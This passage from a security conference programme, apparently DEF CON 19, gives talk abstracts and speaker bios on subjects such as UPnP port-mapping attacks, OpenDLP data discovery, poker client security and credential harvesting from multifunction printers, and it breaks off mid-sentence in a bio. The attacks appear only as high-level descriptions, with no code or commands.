Using only script-kiddie skills, it may be possible to handicap the outcome of decisions of national importance. This talk presents a walk-through of a project to make more accurate predictions of US Supreme Court case outcomes. That could be a useful thing, if you had something at stake. Conventional techniques for predicting outcomes rely on legal expertise and knowledge of the policy issues at stake in a case and the justices' voting records. Forget all that: we're going to see what we can do with perl and XML transcripts of oral arguments. It's only 20 minutes of your life, but it might equip you to astound your lawyer friends, or make some canny investments.



For nearly fifteen years, Foofus has worked in network security, spending most of that time leading the charming and intelligent foofus.net team of penetration testers. Prior research has dealt with software security and trust relationships between systems in large networked environments. In more recent times, Foofus has been enjoying law school, and in particular, finding ways to apply hacker techniques to legal studies.


Getting F***** On the River

Online poker is a multi-million dollar industry that is rapidly growing, but is not highly regulated. There have been "hacks" recently (i.e. weak SSL implementation, superuser account) that have drawn more attention to security in the poker industry, especially as it moves to full regulation in the United States. This talk will cover the technical architecture of online poker, existing security controls, examples of past vulnerabilities, new weaknesses we have discovered in the poker clients and surrounding infrastructure, and next steps of research we are performing in this area.



Mr. Fritschie has been involved in the field of information security for over ten years. He began his career in information technology (IT) as a system administrator for a growing financial company. It was there that he gained a fundamental understanding of all aspects of IT, including network security. Mr. Fritschie then joined the information security consulting practices of KPMG and Deloitte and Touche, leading and performing numerous vulnerability assessments and penetration tests in support of financial audits, GISRA (now FISMA), and other compliance-related efforts. Clients included Fortune 500 companies, civilian agencies, and DOD. Since joining SeNet as the Director of Engineering and Security Assessments, Gus has led several large-scale projects. Some of these projects included enterprise-wide vulnerability assessments for multiple government and commercial clients, management of Certification and Accreditation efforts, and web application penetration tests. He is also an avid poker player, having logged close to a million hands online.



Mike Wright is a senior security engineer who specializes in penetration testing, web application assessments, and breaking stuff. For the past three years, Mike has assisted in enterprise-wide vulnerability assessments as well as C&A engagements for several of SeNet's clients.


Cellular Privacy: A Forensic Analysis of Android Network Traffic

People inherently trust their phones, but should they? "Cellular Privacy: A Forensic Analysis of Android Network Traffic" is a presentation of results from forensically analyzing the network traffic of an Android phone. The results paint an interesting picture. Is Google more trustworthy than the application developers? Are legitimate market apps more trustworthy than their rooted counterparts? Perhaps most importantly, should you trust your passwords, location, and data to a device that shares too much?



Eric Fulton is the Director of Research for Lake Missoula Group, LLC, and a specialist in network penetration testing and web application assessments. In his spare time Eric works with local University students to provide hands-on security training, and conducts independent security research. Eric also publishes network forensics contests on ForensicsContest.com.


UPnP Mapping

Universal Plug and Play (UPnP) is a technology developed by Microsoft in 1999 as a solution for NAT traversal (among other things). This talk explores the exploiting of port mapping services in UPnP/IGD devices from the WAN. It also talks about a tool called Umap to help process the UPnP requests. Attacking UPnP allows attackers to use devices as a proxy that can establish connections to internal and external IP addresses. The software allows scanning internal hosts behind the device NAT, manual port-mapping (WAN to LAN, WAN to WAN) and a SOCKSv4 proxy service that automatically maps requests to UPnP devices. Most UPnP attacks have focused on the exploiting of UPnP from the LAN side of the device; this talk focuses on attacking from the WAN side. Attackers can use these techniques to hide IP addresses and attack internal hosts behind common household gateway devices.



Daniel Garcia (FormateZ on Undernet) is a security researcher/consultant with 15+ years of experience in security. He also founded Toor, a security consultant group that focuses on penetration testing, secure architectures and application assessments. Aside from security, he has also worked with numerous projects and platforms like DOCSIS, WiMAX, Wi-Fi (city-wide), PLC and DHE.


Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP

Got domain admin to a couple of thousand Windows systems? Got an hour to spare? Steal sensitive data from all of these systems simultaneously in under an hour with OpenDLP.



OpenDLP is an open source, agent-based, massively distributable, centrally managed data discovery program that runs as a service on Windows systems and is controlled from a centralized web application. The agent is written in C, has no .NET requirements, uses PCREs for pattern matching, reads inside ZIPs like Office 2007 and OpenOffice files, runs as a low priority service so users do not see or feel it, and securely transmits results to the centralized web application on a regular basis. The web application distributes, installs, and uninstalls agents over SMB; allows you to create reusable profiles, view results in realtime, and mark false positives; and exports results as XML.



OpenDLP also supports scanning databases for sensitive information. It can also perform agentless scans of Windows systems over SMB and UNIX/Linux systems over SSH.



Andrew Gavin, creator of OpenDLP, is an information security consultant at Verizon Business. He has more than 11 years of experience in security assessments of networks and applications. He has consulted for numerous customers in various industries around the world.

Twitter: @andrewgavin


Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies

This presentation argues that computer security has evolved from a technical discipline to a strategic concept. The world's growing dependence on a powerful but vulnerable Internet — combined with the disruptive capabilities of cyber attackers — now threatens national and international security.



Strategic challenges require strategic solutions. The author examines four nation-state approaches to cyber attack mitigation.



• Internet Protocol version 6 (IPv6)

• Sun Tzu's Art of War

• Cyber attack deterrence

• Cyber arms control



The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deterrence is a mix of military and political considerations; arms control is a political/technical approach.



The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demonstrates that IPv6 is currently the most likely of the four examined strategies to improve a nation's cyber defense posture.



There are two primary reasons why IPv6 scores well in this research. First, as a technology, IPv6 is more resistant to outside influence than the other proposed strategies, particularly deterrence and arms control, which should make it a more reliable investment. Second, IPv6 addresses the most significant advantage of cyber attackers today — anonymity.



Kenneth Geers: PhD, CISSP, Naval Criminal Investigative Service (NCIS), is a Scientist and the U.S. Representative to the NATO Cyber Centre in Tallinn, Estonia. His new book, "Strategic Cyber Security," is a FREE download: http://ccdcoe.org/278.html.


Bulletproofing The Cloud: Are We Any Closer To Security?

Cloud security has come into focus in the last few years; while many ways to break the cloud have been proposed, few solutions have been put forward. This talk is primarily a conceptual discussion on how cloud providers can and should be (but probably are not) protecting both their own and their clients' assets in their cloud implementations. It will discuss the known issues with cloud, and a readily available proposed solution to some of these issues. The presentation will conclude with a demonstration of an actual implementation of this theory at a cloud hosting provider. An understanding of basic network security technology is required.



Ramon Gomez is a Security Professional working for a cloud hosting provider. He has been working in correlation theory for the last 8 years, including time spent working at a prominent North American vendor of SEIM software, providing theory and logic to improve the correlation capabilities of the product. His primary areas of professional expertise are in correlation theory, and Intrusion Detection/Analysis.


Smile for the Grenade! "Camera Go Bang!"

Cameras are hugely important to urban and suburban battlefields. Reconnaissance is a must-have for commanders, and a force multiplier for actual combat units. A combat-deployable camera system is being developed or used by nearly every military-industrial manufacturer and government agency, ranging from Throwable Camera Balls to Grenade-style launched cameras. But they're expensive and inaccessible to civilians. Would it be possible to build a combat-deployable camera system that would fulfill the mandates of a tactical combat team, feed information to a strategic command center, and force-multiply "on the cheap"?



Vlad Gostom has over 7 years of experience conducting security consulting and penetration testing in the corporate world. He has worked on such diverse projects as the future warrior combat system, wireless triangulation systems, adaptive IDS/IPS systems, network security/penetration testing for Fortune 50 companies, and physical security assessments for banks.

Twitter: @Recompiler



Joshua Marpet: Security is a complex system, with many disciplines and specialized knowledge. Luckily, there's Josh, who's done everything. Ex-cop, blacksmith, pen testing, video surveillance, sales engineering, and well, everything. And now, technological ordnance developer!

Twitter: @Quadling


Represent! Defcon Groups, Hackerspaces, and You.

Fabricating, circumventing, forging, partying, milling, crafting, building, breaking — Defcon Groups have risen, fallen, and endured the last 8 years as decentralized and smoldering embers of the local hacker think-tank. This year Defcon sets out to stoke that fire and unite our groups, at and outside of the conference. The talk will consist of a panel of Defcon Groups leaders, uncovering the secrets and follies of several groups: what makes them work, when do they fail, and ultimately... WTF have these people been doing all this time? Come hear how hackerspaces have influenced these local groups and the cool ways that these groups are propping up the hackerspace. What can you break?



Anch (DC503) - currently rebooting DC503 after its near-death experience, is a part of the unique hacking scene that is Portland.



blakdayz (DC225) - can pwn sh1t from space, master of a harem, original gangster @ Defcon Voicebridge



Anarchy Angel & ngharo (DC414) - Brew city nerds coming together under the dc414 flag to hack the planet



Itzik Kotler (DC9723) - is killing time till the feds arrive. Meanwhile, he is the CTO of Security Art and co-founder of DC9723. In his former life, he was a Software Engineer. People change. Now, I'm a lamp.



Jake "GenericSuperhero" - Representing Black Lodge Research. Hardware, Software, Wetware, Anywhere, Everywhere.



converge - DCG Coordinator, hermit champion of email harassment and slayer of dead hacker groups; you'll probably see his beard wandering the Defcon landscape in search of booze and fun


Smartfuzzing The Web: Carpe Vestra Foramina

It can be scary to think about how little of the modern attack surface many tools cover. There is no one best tool for the job and on top of that some tools don't do a great job at anything. Often in the hands of general users the capabilities and limitations are not even thought of during testing. Point, click, done. The attack surface of modern web environments as well as their protection mechanisms have become more complicated and yet many tools have not adapted. Hey, Y2K called and it wants some applications tested.



There is certainly no shortage of vulnerabilities in modern web environments, but we should be looking beyond low-hanging fruit at this point. In between fully automated scanners and manual testing lies a sweet spot for the identification of vulnerabilities. Some of the juiciest pieces of information are not found by vulnerability scanners but are found by humans creating custom tests. This is why the semi-automated testing space is so important. All of this complicated blending of protection mechanisms, services, and RIA technologies means that moving into the area of semi-automated testing can be fraught with failure. We detail how these failures can be avoided, and provide a tool that solves some of these problems as well as providing analysis for your own tools and scripts. Your web applications have moved on; don't you think it's time your tools did the same?



Nathan Hamiel is a Principal Consultant for FishNet Security's Application Security Practice. He is also an Associate Professor of Software Engineering at the University of Advancing Technology. He spends most of his time focusing in the areas of application, Web 2.0, and enterprise security. Nathan has been a speaker at security events around the world including Black Hat, DefCon, ShmooCon, ToorCon, SecTor, OWASP and many others. He is also a developer of several open source security projects, including pywebfuzz and RAFT.



Gregory Fleischer is a Senior Security Consultant in the Application Security practice at FishNet Security. In his spare time, he likes to find and exploit vulnerabilities in web browsers and client-side technologies such as Java and Flash. He has an interest in privacy and anonymity and has worked with The Tor Project to identify potential issues.



Justin Engler is a Security Consultant for FishNet Security's Application Security practice. His focus is on the security of web applications, web-backed thick clients (desktop and mobile), databases, and industrial control systems. Justin is currently working on the open source RAFT project.



Seth Law is a Principal Consultant for FishNet Security in Application Security. He spends the majority of his time breaking web and mobile applications, but has been known to code when the need arises. Seth is currently involved in multiple open source projects, including RAFT.

Twitter: @sethlaw


Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests

Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests brings the DEF CON 19 audience the most massive collection of weird, downright bizarre, freaky, and altogether unlikely hacks ever seen in the wild. This talk will focus on those complex hacks found in real environments — some in very high-end and important systems — that are unlikely but true. Through stories and demonstrations we will take the audience into a bizarre world where odd business logic flaws get you almost free food [including home shipping], sourcing traffic from port 0 allows ownership of the finances of a nation, and security systems are used to hack organizations.



The SpiderLabs team delivered more than 2300 penetration tests last year, giving us access to a huge variety of systems and services. We've collected a compendium of the coolest and oddest compromises from the previous year to present at DEF CON. Our goal is to show effective attacks, and at the same time not the trivial ones that can be found by automated methods. By the end of this presentation we hope to have the audience thinking differently about the systems and applications that organizations use every day, and how they may be used against them.



Rob Havelt is the director of penetration testing at Trustwave's SpiderLabs, the advanced security team within Trustwave focused on forensics, ethical hacking, and application security testing for premier clients. Rob has worked with offensive security seemingly forever, and from running a start-up ISP, to working as a TSCM specialist, he's held just about every job possible in the realm of system administration and information security.



Formerly a bourbon-fueled absurdist, raconteur, and man about town, currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.



Wendel Guglielmetti Henrique is a Security Consultant at Trustwave's SpiderLabs, the advanced security team within Trustwave focused on forensics, ethical hacking, and application security testing for premier clients. He has over 11 years experience in Information Technology, where the last 6 years were dedicated to penetration testing. He has performed security focused code reviews, secure development training, forensics analysis and security assessments. Wendel has performed countless network, application and web application penetration tests for various organizations across the globe, including government, banking, commercial sectors, as well as the payment card industry.



Recent presentations include Black Hat Arsenal 2010 (USA), OWASP AppSec Research 2010 (Sweden) and Black Hat Europe 2010 (Spain). Previously, Wendel spoke in Troopers 09 (Germany), OWASP AppSecEU09 (Poland), YSTS 3.0 (Brazil), and has spoken in well known security conferences such as DEF CON 16 (USA) and H2HC (Brazil).



Wendel developed a tool to detect and remove the famous BugBear virus, before most of the antivirus companies around the world in 2002. During his career, he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications. Some tools he wrote already were used as examples in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine.


From Printer To Pwnd: Leveraging Multifunction Printers During Penetration Testing

In this presentation we go beyond the common printer issues and focus on harvesting data from multifunction printers (MFPs) that can be leveraged to gain access to other core network systems. By taking advantage of poor printer security and vulnerabilities during penetration testing, we are able to harvest a wealth of information from MFP devices, including usernames, email addresses, and authentication information such as SMB, email and LDAP passwords. Leveraging this information, we have successfully gained administrative access to core systems including email servers, file servers and Active Directory domains on multiple occasions. We will also explore MFP device vulnerabilities, including authentication bypass and information leakage flaws. Tying this all together, we will discuss the development of an automated process for harvesting information from MFP devices with the updated release of our tool 'PRAEDA'.

Deral Heiland, CISSP, serves as a Senior Security Engineer, where he is responsible for security assessments and consulting for corporations and government agencies. In addition, Deral is the founder of Layered Defense Research, a group of security professionals responsible for discovering and publishing multiple vulnerabilities. Deral is also co-founder and president of the Ohio Information Security Forum, a not-for-profit organization that focuses on information security training and education. Deral has also presented at numerous conferences including ShmooCon, DEF CON, AFCEA InfoTech, Ohio Digital Government Summit, Univ